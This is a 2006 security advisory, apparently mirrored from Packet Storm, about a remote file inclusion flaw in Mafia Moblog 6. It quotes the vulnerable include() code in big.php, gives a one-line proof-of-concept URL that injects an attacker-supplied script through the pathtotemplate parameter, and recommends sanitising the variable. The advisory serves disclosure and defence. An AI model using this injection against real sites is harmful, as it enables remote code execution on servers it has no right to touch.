Lucene search
K

mafiaMoblog.txt

🗓️ 27 Aug 2006 00:00:00Reported by Sh3llType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 80 Views

Mafia Moblog RFI Vulnerability pathtotemplat

Code
`-------------------------------------------------------------------------------------------  
Mafia Moblog pathtotemplate Remote File Inclusion  
-------------------------------------------------------------------------------------------  
Author : Sh3ll  
Date : 2006/04/30  
HomePage : http://www.sh3ll.ir  
Contact : sh3ll[at]sh3ll[dot]ir  
-------------------------------------------------------------------------------------------  
Affected Software Description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : Mafia Moblog  
version : 6  
Venedor : http://mafia.pearlabs.org  
Class : Remote File Inclusion  
Risk : High  
Summary :   
A Free, Fully Customizeable, Open-Source MoBlog script that will run on any   
platform that is PHP and MySQL compatible.   
-------------------------------------------------------------------------------------------  
Vulnerability:  
~~~~~~~~~~~~~  
The problem exists is in the big.php when used the variable $pathtotemplate in a   
include() function without being Declared.  
----------------------------------------big.php--------------------------------------------  
...  
<?php  
  
include("info.php");  
  
include("template.php");  
  
if (file_exists("$pathtotemplate/includes.php")) {include("$pathtotemplate/includes.php");}  
  
include("$pathtotemplate/big.php");  
  
?>  
...  
-------------------------------------------------------------------------------------------  
PoC:  
~~~  
http://www.target.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script]  
  
Solution:  
~~~~~~~~  
Sanitize Variabel $pathtotemplate in big.php  
-------------------------------------------------------------------------------------------  
Note:  
~~~~  
venedor contacted, but no response. so do a dirty patch.  
-------------------------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena  
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation